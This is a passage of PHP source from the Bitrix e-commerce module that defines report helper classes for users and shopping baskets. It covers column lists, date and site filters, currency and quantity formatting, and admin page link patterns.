else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting short name fields of buyers.
foreach (self::$userNotAuthNameFields as $uField)
{
if (preg_match('/'.$uField.'$/', $k))
{
if (empty($v) || is_null($v) || $v == ' ')
{
$v = GetMessage('SALE_REPORT_USER_NOT_AUTH');
}
break;
}
}
}
public static function formatResultGroupingTotal($params)
{
$paramTotal = array('TOTAL_'.$params['k'] => &$params['v']);
$viewColumns = array($params['k'] => &$params['cInfo']);
$bFormatOnly = true;
static::formatResultsTotal($paramTotal, $viewColumns, $bFormatOnly);
}
public static function formatResultsTotal(&$total, &$columnInfo, &$bFormatOnly = null)
{
parent::formatResultsTotal($total, $columnInfo);
foreach ($total as $k => &$v)
{
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
if (!$bFormatOnly) $v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting fields without summary calculation.
foreach (self::$withoutTotalFields as $wtField)
{
if (preg_match('/TOTAL_'.$wtField.'$/', $k))
{
unset($total[$k]);
break;
}
}
}
}
public static function getDefaultElemHref($elem, $fList)
{
$href = '';
if (empty($elem['aggr']))
{
$field = $fList[$elem['name']];
if ($field->getEntity()->getName() == 'User')
{
if (in_array(
$elem['name'],
array(
'USER.EMAIL',
'EMP_CANCELED_BY.EMAIL',
'EMP_STATUS_BY.EMAIL',
'Payment:ORDER.EMP_PAID_BY.EMAIL',
'Payment:ORDER.RESPONSIBLE_BY.EMAIL',
'Shipment:REPS_ORDER.EMP_ALLOW_DELIVERY_BY.EMAIL',
'Shipment:REPS_ORDER.EMP_DEDUCTED_BY.EMAIL',
'Shipment:REPS_ORDER.RESPONSIBLE_BY.EMAIL'
),
true))
{
$href = array('pattern' => 'mailto:#'.$elem['name'].'#');
}
else if (in_array(
$elem['name'],
array(
'USER.SHORT_NAME',
'EMP_CANCELED_BY.SHORT_NAME',
'EMP_STATUS_BY.SHORT_NAME',
'Payment:ORDER.EMP_PAID_BY.SHORT_NAME',
'Payment:ORDER.RESPONSIBLE_BY.SHORT_NAME',
'Shipment:REPS_ORDER.EMP_ALLOW_DELIVERY_BY.SHORT_NAME',
'Shipment:REPS_ORDER.EMP_DEDUCTED_BY.SHORT_NAME',
'Shipment:REPS_ORDER.RESPONSIBLE_BY.SHORT_NAME'
),
true))
{
$userDef = substr($elem['name'], 0, -11);
$href = array('pattern' => '/bitrix/admin/sale_buyers_profile.php?USER_ID=#'.$userDef.'.ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() == 'Order')
{
if ($elem['name'] === 'ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_view.php?ID=#ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() === 'Payment')
{
if ($elem['name'] === 'Payment:ORDER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_payment_edit.php?order_id=#Payment:ORDER.ORDER_ID#&payment_id=#Payment:ORDER.ID#&lang='.LANG);
}
else if ($elem['name'] === 'Payment:ORDER.PAY_SYSTEM_ID'
|| $elem['name'] === 'Payment:ORDER.PAY_SYSTEM_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_pay_system_edit.php?ID=#Payment:ORDER.PAY_SYSTEM_ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() === 'Shipment')
{
if ($elem['name'] === 'Shipment:REPS_ORDER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_shipment_edit.php?order_id=#Shipment:REPS_ORDER.ORDER_ID#&shipment_id=#Shipment:REPS_ORDER.ID#&lang='.LANG);
}
else if ($elem['name'] === 'Shipment:REPS_ORDER.DELIVERY_ID'
|| $elem['name'] === 'Shipment:REPS_ORDER.DELIVERY_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_delivery_service_edit.php?ID=#Shipment:REPS_ORDER.DELIVERY_ID#&lang='.LANG);
}
}
}
return $href;
}
}
class CSaleReportUserHelper extends CBaseSaleReportHelper
{
private static $monetaryFields = array(
'DISCOUNT_ALL',
'PRICE',
'SUM_PAID_FORREP',
// Order fields
'TAX_VALUE',
'PRICE_DELIVERY',
'DISCOUNT_ALL',
'PRICE',
'SUM_PAID_FORREP'
);
private static $goodsQuantityFields = array(
'SALE_ORDER_USER_PRODUCTS_QUANT',
// Order fields
'PRODUCTS_QUANT'
);
private static $withoutTotalFields = array(
// Order fields
'PERSON_TYPE_ID'
);
private static $userNotAuthNameFields = array();
public static function getEntityName()
{
return 'Bitrix\Main\User';
}
public static function getOwnerId()
{
return SALE_REPORT_OWNER_ID.'_User';
}
public static function getColumnList()
{
IncludeModuleLangFile(__FILE__);
return array(
'ID',
'DATE_REG_SHORT',
'LAST_LOGIN_SHORT',
'ACTIVE',
'LOGIN',
'NAME',
'LAST_NAME',
/*'LID',*/
'SHORT_NAME',
'PERSONAL_GENDER',
'EMAIL',
'PERSONAL_PHONE',
'Bitrix\Sale\Internals\Order:USER' => array(
'DATE_INSERT_SHORT',
'DATE_UPDATE_SHORT',
'STATUS' => array(
'STATUS_ID',
'NAME',
'DESCRIPTION'
),
'EMP_STATUS_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_STATUS_SHORT',
'PRICE_DELIVERY',
'PAYED',
'DEDUCTED',
'PRICE',
'SUM_PAID_FORREP',
'CANCELED',
'EMP_CANCELED_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_CANCELED_SHORT',
'REASON_CANCELED',
'PRODUCTS_QUANT',
'TAX_VALUE',
'DISCOUNT_ALL',
'PERSON_TYPE_ID'
),
'UserGroup:USER.GROUP' => array(
'ID',
'NAME'
)
);
}
public static function getCalcVariations()
{
return array_merge(parent::getCalcVariations(), array(
'UserGroup:USER.GROUP.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'UserGroup:USER.GROUP.NAME' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
)
));
}
public static function getCompareVariations()
{
return array_merge(parent::getCompareVariations(), array(
// Order
'\Bitrix\Sale\Internals\StatusLang' => array(
'EQUAL',
'NOT_EQUAL'
),
'Bitrix\Sale\Internals\Order:USER.PERSON_TYPE_ID' => array(
'EQUAL',
'NOT_EQUAL'
),
// User
'PERSONAL_GENDER' => array(
'EQUAL',
'NOT_EQUAL'
),
'UserGroup:USER.GROUP' => array(
'EQUAL',
'NOT_EQUAL'
),
'\Bitrix\Main\User' => array(
'EQUAL'
),
'\Bitrix\Main\Group' => array(
'EQUAL'
)
));
}
public static function getDefaultColumns()
{
return array(
array('name' => 'ID'),
array('name' => 'SHORT_NAME')
);
}
public static function getPeriodFilter($date_from, $date_to)
{
if(is_null($date_from) && is_null($date_to))
{
return array(); // Empty filter for empty time interval.
}
$filter = array('LOGIC' => 'AND');
if(!is_null($date_to))
{
$filter[] = array(
'LOGIC' => 'OR',
'<=DATE_REG_SHORT' => $date_to,
'=DATE_REG_SHORT' => null
);
}
if(!is_null($date_from))
{
$filter[] = array(
'LOGIC' => 'OR',
'>=DATE_REG_SHORT' => $date_from,
'=DATE_REG_SHORT' => null
);
}
return $filter;
}
public static function fillFilterReferenceColumn(&$filterElement, Entity\ReferenceField $field)
{
if ($field->getRefEntityName() == '\Bitrix\Main\User')
{
// USER
if ($filterElement['value'])
{
$res = CUser::GetByID($filterElement['value']);
$user = $res->fetch();
if ($user)
{
$username = CUser::FormatName(CSite::GetNameFormat(null, self::getDefaultSiteId()), $user, true, false);
$filterElement['value'] = array('id' => $user['ID'], 'name' => $username);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('REPORT_USER_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
else if ($field->getRefEntityName() == '\Bitrix\Main\Group')
{
// GROUP
if ($filterElement['value'])
{
$res = CGroup::GetByID($filterElement['value']);
$group = $res->fetch();
if ($group)
{
$filterElement['value'] = array('id' => $group['ID'], 'name' => $group['NAME']);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('SALE_REPORT_GROUP_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
}
public static function confirmFilterBackReferenceRewrite($fElem, $chain)
{
if (strncasecmp($fElem['name'], 'Bitrix\Sale\Internals\Order:USER', 23) === 0)
{
return false;
}
return true;
}
public static function confirmSelectBackReferenceRewrite($elem, $chain)
{
if (strncasecmp($elem['name'], 'Bitrix\Sale\Internals\Order:USER', 23) === 0)
{
return false;
}
return true;
}
private static function fieldInFilter(&$filter, $fieldPathStr)
{
foreach ($filter as $k => &$v)
{
if ($k === 'LOGIC') continue;
if (is_array($v)) return(self::fieldInFilter($v, $fieldPathStr));
else if (strpos($k, $fieldPathStr) !== false) return true;
}
return false;
}
private static function filterBySiteNeeded(&$select, &$filter)
{
// The filter by site is necessary, if the field of "Order" entity in the filter or select is used.
$bResult = false;
foreach (array_keys($select) as $k)
{
if (strpos($k, '_SALE_ORDER_USER_') !== false)
{
$bResult = true;
break;
}
}
if (!$bResult)
{
if (self::fieldInFilter($filter, 'Bitrix\Sale\Internals\Order:USER.')) $bResult = true;
}
return $bResult;
}
public static function beforeViewDataQuery(&$select, &$filter, &$group, &$order, &$limit, &$options, &$runtime = null)
{
global $DB;
// Rewrite filter by Site.
if (self::filterBySiteNeeded($select, $filter))
{
if ($filter['LOGIC'] === 'AND')
{
$filter[] = array(
'LOGIC' => 'OR',
array('=Bitrix\Sale\Internals\Order:USER.LID' => $DB->ForSql(self::getDefaultSiteId())),
array('=Bitrix\Sale\Internals\Order:USER.LID' => null)
);
}
else
{
$subFilter = $filter;
foreach (array_keys($filter) as $k)
{
unset($filter[$k]);
}
$filter['LOGIC'] = 'AND';
$filter[] = $subFilter;
$filter[] = array(
'LOGIC' => 'OR',
array('=Bitrix\Sale\Internals\Order:USER.LID' => $DB->ForSql(self::getDefaultSiteId())),
array('=Bitrix\Sale\Internals\Order:USER.LID' => null)
);
}
}
}
/* remove it when PHP 5.3 available */
public static function formatResults(&$rows, &$columnInfo, $total)
{
foreach ($rows as &$row)
{
foreach ($row as $k => &$v)
{
if (!array_key_exists($k, $columnInfo))
{
continue;
}
$cInfo = &$columnInfo[$k];
if (is_array($v))
{
foreach ($v as &$subv)
{
self::formatResultValue($k, $subv, $row, $cInfo, $total);
}
}
else
{
self::formatResultValue($k, $v, $row, $cInfo, $total);
}
}
}
unset($row, $v, $subv);
}
/* \remove it */
public static function formatResultValue($k, &$v, &$row, &$cInfo, $total, &$customChartValue = null)
{
$dataType = self::getFieldDataType($cInfo['field']);
/** @var Bitrix\Main\Entity\Field[] $cInfo */
if ($dataType !== 'float' ) // skip base rounding
{
parent::formatResultValue($k, $v, $row, $cInfo, $total);
}
if ($k === 'LID')
{
$v = self::$sitelist[$v];
}
else if ($k === 'PERSONAL_GENDER')
{
$v = self::$genders[$v];
}
// Removing the link from the email field if is empty.
else if ($k === 'EMAIL')
{
if (is_null($v) || empty($v) || $v == ' ') unset($row['__HREF_'.$k]);
}
else if ($k === 'MAIN_USER_SALE_ORDER_USER_PERSON_TYPE_ID')
{
$v = self::$personTypes[$v]['NAME'];
}
// Inserting zero in numerical fields with null value.
if (empty($v))
{
if (in_array($dataType, array('integer', 'float')))
{
$v = 0;
}
//else $v = ' ';
}
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if ($cInfo['field']->getEntity()->getDataClass() === 'Bitrix\\Sale\\Internals\\OrderTable'
&& preg_match('/'.$monField.'$/', $cInfo['field']->getName()))
{
$v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting short name fields of buyers.
foreach (self::$userNotAuthNameFields as $uField)
{
if (preg_match('/'.$uField.'$/', $k))
{
if (empty($v) || is_null($v) || $v == ' ')
{
$v = GetMessage('SALE_REPORT_USER_NOT_AUTH');
}
break;
}
}
}
public static function formatResultGroupingTotal($params)
{
$paramTotal = array('TOTAL_'.$params['k'] => &$params['v']);
$viewColumns = array($params['k'] => &$params['cInfo']);
$bFormatOnly = true;
static::formatResultsTotal($paramTotal, $viewColumns, $bFormatOnly);
}
public static function formatResultsTotal(&$total, &$columnInfo, &$bFormatOnly = null)
{
parent::formatResultsTotal($total, $columnInfo);
foreach ($total as $k => &$v)
{
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
if (!$bFormatOnly) $v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting fields without summary calculation.
foreach (self::$withoutTotalFields as $wtField)
{
if (preg_match('/TOTAL_'.$wtField.'$/', $k))
{
unset($total[$k]);
break;
}
}
}
}
public static function getDefaultElemHref($elem, $fList)
{
$href = '';
if (empty($elem['aggr']))
{
$field = $fList[$elem['name']];
if ($field->getEntity()->getName() == 'User')
{
if ($elem['name'] == 'SHORT_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_buyers_profile.php?USER_ID=#ID#&lang='.LANG);
}
else if ($elem['name'] == 'EMAIL')
{
$href = array('pattern' => 'mailto:#EMAIL#');
}
else if ($elem['name'] == 'Bitrix\Sale\Internals\Order:USER.EMP_STATUS_BY.SHORT_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_buyers_profile.php?USER_ID=#Bitrix\Sale\Internals\Order:USER.EMP_STATUS_BY.ID#&lang='.LANG);
}
else if ($elem['name'] == 'Bitrix\Sale\Internals\Order:USER.EMP_STATUS_BY.EMAIL')
{
$href = array('pattern' => 'mailto:#Bitrix\Sale\Internals\Order:USER.EMP_STATUS_BY.EMAIL#');
}
else if ($elem['name'] == 'Bitrix\Sale\Internals\Order:USER.EMP_CANCELED_BY.SHORT_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_buyers_profile.php?USER_ID=#Bitrix\Sale\Internals\Order:USER.EMP_CANCELED_BY.ID#&lang='.LANG);
}
else if ($elem['name'] == 'Bitrix\Sale\Internals\Order:USER.EMP_CANCELED_BY.EMAIL')
{
$href = array('pattern' => 'mailto:#Bitrix\Sale\Internals\Order:USER.EMP_CANCELED_BY.EMAIL#');
}
}
elseif ($field->getEntity()->getName() == 'Order')
{
if ($elem['name'] == 'Bitrix\Sale\Internals\Order:USER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_view.php?ID=#Bitrix\Sale\Internals\Order:USER.ID#&lang='.LANG);
}
}
}
return $href;
}
}
class CSaleReportSaleBasketHelper extends CBaseSaleReportHelper
{
private static $monetaryFields = array(
'PRICE',
'DISCOUNT_PRICE',
'SUMMARY_PRICE',
'VAT_RATE_PRC',
// Order fields
'TAX_VALUE',
'PRICE_DELIVERY',
'DISCOUNT_ALL',
'PRICE',
'SUM_PAID_FORREP',
'PAYMENT_ORDER_SUM',
'PRODUCT_PURCHASING_PRICE_IN_SITE_CURRENCY',
'GROSS_PROFIT',
'PROFITABILITY'
);
private static $goodsQuantityFields = array(
'QUANTITY',
'PRODUCT_QUANTITY',
// Order fields
'PRODUCTS_QUANT'
);
private static $withoutTotalFields = array(
'PRODUCT_ID',
'FUSER_ID',
'ORDER_ID',
'PRODUCT_SALE_GOODS_SECTION_PROD_SECT_ID',
'PRODUCT_SALE_GOODS_SECTION_PROD_SECT_NAME',
'VAT_RATE_PRC',
// Order fields
'PERSON_TYPE_ID'
);
private static $avgGroupingAggregationFields = array(
'PROFITABILITY'
);
private static $userNotAuthNameFields = array(
'FUSER_USER_SHORT_NAME'
);
private static $currentIblockFilter = array('value' => null, 'compare' => null);
public static function getEntityName()
{
return 'Bitrix\Sale\Internals\Basket';
}
public static function getOwnerId()
{
return SALE_REPORT_OWNER_ID.'_SaleBasket';
}
public static function getColumnList()
{
IncludeModuleLangFile(__FILE__);
return array(
'ID',
'FUSER_ID',
'FUSER.USER' => array(
'ID',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE',
'UserGroup:USER.GROUP' => array(
'ID',
'NAME'
)
),
'DATE_INS',
'DATE_UPD',
'PRODUCT_ID',
'NAME',
'NAME_WITH_IDENT',
'DELAY',
'ORDER_ID',
'ORDER' => array(
'DATE_INSERT_SHORT',
'DATE_UPDATE_SHORT',
'STATUS' => array(
'STATUS_ID',
'NAME',
'DESCRIPTION'
),
'EMP_STATUS_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_STATUS_SHORT',
'PRICE_DELIVERY',
'PAYED',
'Payment:ORDER' => array(
'ID',
'DATE_BILL',
'DATE_PAY_BEFORE',
'DATE_PAID',
'EMP_PAID_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'PAY_VOUCHER_NUM',
'PAY_VOUCHER_DATE',
'PAY_SYSTEM_ID',
'PAY_SYSTEM_NAME',
'PAY_RETURN_NUM',
'PAY_RETURN_DATE',
'SUM',
'CURRENCY',
'RESPONSIBLE_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
)
),
'DEDUCTED',
'Shipment:REPS_ORDER' => array(
'ID',
'ALLOW_DELIVERY',
'DELIVERY_ID',
'DELIVERY_NAME',
'EMP_ALLOW_DELIVERY_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_ALLOW_DELIVERY_SHORT',
'DELIVERY_DOC_NUM',
'DELIVERY_DOC_DATE_SHORT',
'DEDUCTED',
'EMP_DEDUCTED_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_DEDUCTED_SHORT',
'RESERVED',
'TRACKING_NUMBER',
'PRICE_DELIVERY',
'CURRENCY',
'RESPONSIBLE_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
)
),
'PRICE',
'SUM_PAID_FORREP',
'CANCELED',
'EMP_CANCELED_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_CANCELED_SHORT',
'REASON_CANCELED',
'PRODUCTS_QUANT',
'TAX_VALUE',
'DISCOUNT_ALL',
'PERSON_TYPE_ID'
),
'PRICE',
'DISCOUNT_PRICE',
'DISCOUNT_NAME',
'DISCOUNT_VALUE',
'NOTES',
'QUANTITY',
'SUMMARY_PRICE',
'VAT_RATE_PRC',
'PRODUCT.ACTIVE',
'SUBSCRIBE',
'N_SUBSCRIBE',
'PRODUCT.QUANTITY',
'SUMMARY_PURCHASING_PRICE',
'GROSS_PROFIT',
'PROFITABILITY',
'PRODUCT.GoodsSection:PRODUCT.SECT' => array(
'ID',
'NAME'
)
);
}
public static function getDefaultColumns()
{
return array(
array('name' => 'ID'),
array('name' => 'DATE_UPD'),
array('name' => 'ORDER_ID'),
array('name' => 'PRODUCT_ID'),
array('name' => 'NAME')
);
}
public static function getCalcVariations()
{
return array_merge(parent::getCalcVariations(), array(
'date' => array(
'MIN',
'MAX',
'COUNT_DISTINCT'
),
'FUSER.USER.UserGroup:USER.GROUP.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'FUSER.USER.UserGroup:USER.GROUP.NAME' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'PRODUCT.GoodsSection:PRODUCT.SECT.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'PRODUCT.GoodsSection:PRODUCT.SECT.NAME' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
)
));
}
public static function getCompareVariations()
{
return array_merge(parent::getCompareVariations(), array(
'date' => array(
'EQUAL',
'GREATER_OR_EQUAL',
'GREATER',
'LESS',
'LESS_OR_EQUAL',
'NOT_EQUAL'
),
// Order
'ORDER.LID' => array(
'EQUAL',
'NOT_EQUAL'
),
'ORDER.PERSON_TYPE_ID' => array(
'EQUAL',
'NOT_EQUAL'
),
'ORDER.STATUS' => array(
'EQUAL',
'NOT_EQUAL'
),
// Basket
'PRODUCT.GoodsSection:PRODUCT.SECT' => array(
'EQUAL'/*,
'NOT_EQUAL'*/
),
'FUSER.USER.UserGroup:USER.GROUP' => array(
'EQUAL',
'NOT_EQUAL'
),
'\Bitrix\Main\User' => array(
'EQUAL'
),
'\Bitrix\Main\Group' => array(
'EQUAL'
)
));
}
public static function getPeriodFilter($date_from, $date_to)
{
global $DB;
$filter = array('LOGIC' => 'AND');
if(!is_null($date_to))
{
$filter[] = array(
'LOGIC' => 'OR',
'<=DATE_UPD' => $date_to,
'=DATE_UPD' => null
);
}
if(!is_null($date_from))
{
$filter[] = array(
'LOGIC' => 'OR',
'>=DATE_UPD' => $date_from,
'=DATE_UPD' => null
);
}
// Site filter
$filter[] = array(
'=LID' => $DB->ForSql(self::getDefaultSiteId())
);
return $filter;
}
public static function beforeFilterBackReferenceRewrite(&$filter, $viewColumns)
{
// Field for filtering category of the goods
$fieldName = 'PRODUCT.GoodsSection:PRODUCT.SECT.ID';
// <editor-fold defaultstate="collapsed" desc="Preparation of multiple filters">
foreach ($filter as $fId => &$fInfo)
{
foreach ($fInfo as $k => &$fElem)
{
if (is_array($fElem) && $fElem['type'] == 'field')
{
$columnName = '';
if (preg_match('/__COLUMN__(\d+)/', $fElem['name'], $match))
{
$num = $match[1];
$columnName = $viewColumns[$num]['fieldName'];
}
if ($fElem['name'] == $fieldName || $columnName == $fieldName)
{
$iblockFilterCompare = $fElem['compare'];
if ($iblockFilterCompare === 'EQUAL'/* || $iblockFilterCompare === 'NOT_EQUAL'*/)
{
$iblockFilterValue = array();
$arFilterValues = array();
if (is_array($fElem['value'])) $arFilterValues = $fElem['value'];
else $arFilterValues[] = $fElem['value'];
foreach ($arFilterValues as $l => $filterValue)
{
if (is_string($filterValue) && $filterValue[0] == 'c')
{
$iblockFilterValue[] = intval(substr($filterValue, 1));
// The filter on a section is deleted if the filter only according
// to the catalog is necessary
unset($arFilterValues[$l]);
}
else
{
$sections = array();
foreach (parent::$catalogSections as $sectKey => $sect)
{
if ($sectKey == $filterValue) $iblockFilterValue[] = intval($sect['catalog']['ID']);
if (in_array($filterValue, $sect['path'])) $sections[] = $sectKey;
}
$arFilterValues[$l] = $sections;
}
}
$l = count($arFilterValues);
if ($l === 0) unset($fInfo[$k]);
else if ($l === 1) $fInfo[$k]['value'] = reset($arFilterValues);
else
{
$newFilterValue = array();
foreach ($arFilterValues as $filterValue)
{
$newFilterValue = array_merge($newFilterValue, $filterValue);
}
$newFilterValue = array_unique($newFilterValue);
$fInfo[$k]['value'] = $newFilterValue;
}
$l = count($iblockFilterValue);
if ($l === 0) $iblockFilterValue = null;
else if ($l === 1) $iblockFilterValue = reset($iblockFilterValue);
else $iblockFilterValue = array_unique($iblockFilterValue);
self::$currentIblockFilter['value'] = $iblockFilterValue;
self::$currentIblockFilter['compare'] = $iblockFilterCompare;
}
}
}
}
}
// </editor-fold>
}
public static function beforeViewDataQuery(&$select, &$filter, &$group, &$order, &$limit, &$options, &$runtime = null)
{
if (self::$currentIblockFilter['value'])
{
$filter[] = array(
'LOGIC' => 'AND',
((self::$currentIblockFilter['compare'] === 'EQUAL') ? '=' : '!=').'PRODUCT.IBLOCK.IBLOCK_ID' => self::$currentIblockFilter['value']
);
}
self::$currentIblockFilter['value'] = null;
self::$currentIblockFilter['compare'] = null;
}
public static function fillFilterReferenceColumn(&$filterElement, Entity\ReferenceField $field)
{
if ($field->getRefEntityName() == '\Bitrix\Main\User')
{
// USER
if ($filterElement['value'])
{
$res = CUser::GetByID($filterElement['value']);
$user = $res->fetch();
if ($user)
{
$username = CUser::FormatName(CSite::GetNameFormat(null, self::getDefaultSiteId()), $user, true, false);
$filterElement['value'] = array('id' => $user['ID'], 'name' => $username);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('REPORT_USER_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
else if ($field->getRefEntityName() == '\Bitrix\Main\Group')
{
// GROUP
if ($filterElement['value'])
{
$res = CGroup::GetByID($filterElement['value']);
$group = $res->fetch();
if ($group)
{
$filterElement['value'] = array('id' => $group['ID'], 'name' => $group['NAME']);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('SALE_REPORT_GROUP_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
}
/* remove it when PHP 5.3 available */
public static function formatResults(&$rows, &$columnInfo, $total)
{
foreach ($rows as &$row)
{
foreach ($row as $k => &$v)
{
if (!array_key_exists($k, $columnInfo))
{
continue;
}
$cInfo = &$columnInfo[$k];
if (is_array($v))
{
foreach ($v as &$subv)
{
self::formatResultValue($k, $subv, $row, $cInfo, $total);
}
}
else
{
self::formatResultValue($k, $v, $row, $cInfo, $total);
}
}
}
unset($row, $v, $subv);
}
/* \remove it */
public static function formatResultValue($k, &$v, &$row, &$cInfo, $total, &$customChartValue = null)
{
$dataType = self::getFieldDataType($cInfo['field']);
/** @var Bitrix\Main\Entity\Field[] $cInfo */
if ($dataType !== 'float' ) // skip base rounding
{
parent::formatResultValue($k, $v, $row, $cInfo, $total);
}
if ($k === 'SALE_BASKET_ORDER_PERSON_TYPE_ID')
{
$v = self::$personTypes[$v]['NAME'];
}
// Removing the link from the email field if is empty.
else if ($k === 'SALE_BASKET_FUSER_USER_EMAIL')
{
if (is_null($v) || empty($v) || $v == ' ') unset($row['__HREF_'.$k]);
}
else if ($k === 'SALE_BASKET_ORDER_PERSON_TYPE_ID')
{
$v = self::$personTypes[$v]['NAME'];
}
// Inserting zero in numerical fields with null value.
if (empty($v))
{
if (in_array($dataType, array('integer', 'float')))
{
$v = 0;
}
//else $v = ' ';
}
if (empty($cInfo['aggr']))
{
if (($cInfo['field']->getEntity()->getName() === 'Shipment'
&& in_array($cInfo['field']->getName(), array('ID', 'DELIVERY_ID', 'DELIVERY_NAME'), true))
|| ($cInfo['field']->getEntity()->getName() === 'Payment'
&& in_array($cInfo['field']->getName(), array('ID', 'PAY_SYSTEM_ID', 'PAY_SYSTEM_NAME'), true)))
{
if (is_null($v) || empty($v) || $v == ' ')
{
unset($row['__HREF_'.$k]);
}
}
}
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
$v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting short name fields of buyers.
foreach (self::$userNotAuthNameFields as $uField)
{
if (preg_match('/'.$uField.'$/', $k))
{
if (empty($v) || is_null($v) || $v == ' ')
{
$v = GetMessage('SALE_REPORT_USER_NOT_AUTH');
unset($row['__HREF_'.$k]);
}
break;
}
}
// fields has average grouping aggregation (default grouping aggregation is sum)
if (!isset($cInfo['grouping_aggr']))
{
foreach (self::$avgGroupingAggregationFields as $aggrField)
{
if (preg_match('/'.$aggrField.'$/', $k))
{
$cInfo['grouping_aggr'] = 'AVG';
}
}
}
}
public static function formatResultGroupingTotal($params)
{
$paramTotal = array('TOTAL_'.$params['k'] => &$params['v']);
$viewColumns = array($params['k'] => &$params['cInfo']);
$bFormatOnly = true;
static::formatResultsTotal($paramTotal, $viewColumns, $bFormatOnly);
}
public static function formatResultsTotal(&$total, &$columnInfo, &$bFormatOnly = null)
{
parent::formatResultsTotal($total, $columnInfo);
foreach ($total as $k => &$v)
{
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
if (!$bFormatOnly) $v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting fields without summary calculation.
foreach (self::$withoutTotalFields as $wtField)
{
if (preg_match('/TOTAL_'.$wtField.'$/', $k))
{
unset($total[$k]);
break;
}
}
}
}
public static function getDefaultElemHref($elem, $fList)
{
$href = '';
if (empty($elem['aggr']))
{
$field = $fList[$elem['name']];
